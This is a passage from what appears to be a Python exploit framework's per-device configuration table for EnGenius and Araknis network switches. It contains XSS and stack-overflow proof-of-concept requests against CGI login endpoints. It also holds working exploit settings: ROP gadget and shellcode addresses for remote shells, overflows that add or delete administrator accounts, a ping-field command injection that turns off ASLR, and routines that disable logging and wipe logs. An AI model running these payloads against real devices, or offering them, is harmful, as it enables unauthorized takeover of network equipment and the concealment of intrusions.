XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_logo_ul.cgi': {\r\n\t\t\t\t\t\t\t'description':'Unauthenticated upload of \"logo_icon\". (PoC: Upload invalid file)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'json',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_logo_ul.cgi',\r\n\t\t\t\t\t\t\t'content':'Content-Disposition: filename.png\\n------',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_locallogin.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',\r\n\t\t\t\t\t\t\t'content':'username=admin&password=' + self.random_string(196),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"called\", XSS in \"userurl & uamip\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.jrpc.dispatch.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"usr, pswrd and method\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',\r\n\t\t\t\t\t\t\t'content':'{\"id\":1, \"jsonrpc\":\"2.0\",\"params\":{\"usr\":\"admin\",\"pswrd\":\"' + self.random_string(288) + '\"},\"method\":\"login\"}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.auth': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"user, chap_chal, chap_pass\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),\r\n\t\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E15C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system 
# opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840690,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t# pt: 0 = no password, 1 = cleartext, 2 = encrypted\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42D1D4,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42D1D4,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42CB8C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x4494E8,\t# Jump one 
after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x44B0C0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x44B0C0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42E438,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42E438,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42E438,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x100271A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = 
Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'14044-44104': {\r\n\t\t\t\t'template':'EnGenius',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.07.22_c1.9.21_181018-0228',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'EWS1200-28TFP',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'cpl_locallogin.cgi (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"redirecturl,userurl,loginurl,username,password\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"userurl & uamip\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_logo_ul.cgi': {\r\n\t\t\t\t\t\t\t'description':'Unauthenticated upload of \"logo_icon\". 
(PoC: Upload invalid file)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'json',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_logo_ul.cgi',\r\n\t\t\t\t\t\t\t'content':'Content-Disposition: filename.png\\n------',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_locallogin.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',\r\n\t\t\t\t\t\t\t'content':'username=admin&password=' + self.random_string(196),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"called\", XSS in \"userurl & uamip\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.jrpc.dispatch.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"usr, pswrd and method\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',\r\n\t\t\t\t\t\t\t'content':'{\"id\":1, 
\"jsonrpc\":\"2.0\",\"params\":{\"usr\":\"admin\",\"pswrd\":\"' + self.random_string(288) + '\"},\"method\":\"login\"}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.auth': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"user, chap_chal, chap_pass\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),\r\n\t\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E15C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840690,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t# pt: 0 = no password, 1 = cleartext, 2 = encrypted\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42C334,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary 
dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42C334,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42BCEC,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x448008,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x449BE0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x449BE0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42D598,\t# Jump one after 'sw $ra'\t\t\t# 
Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42D598,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42D598,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x100271A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Araknis Networks\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'8028-89928': {\r\n\t\t\t\t'template':'Araknis',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.2.00_171225-1618',\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'AN-310-SW-16-POE',\t\t\t\t# Model\r\n\t\t\t\t'uri':'http://araknisnetworks.com/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': 
{\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E04C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840470,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': False, \t\t\t\t\t# Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42A494,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&session_uid=0&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_EncrypOnly_user_mngSet()\r\n\t\t\t\t\t\t'address':0x4303B4,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42ADB8,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=&pv=0&op=0',\t\t# 
\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# user\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x44DBD8,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x44FC88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x44FC88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42BAE4,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42BAE4,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42BAE4,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t# We need these to push NOP and shellcode on higher heap addresses to avoid 0x00\r\n\t\t\t\t\t\t'query': (self.random_string(1) +'=' + self.random_string(1) +'&') * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t#'query':'a=a&' * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack 
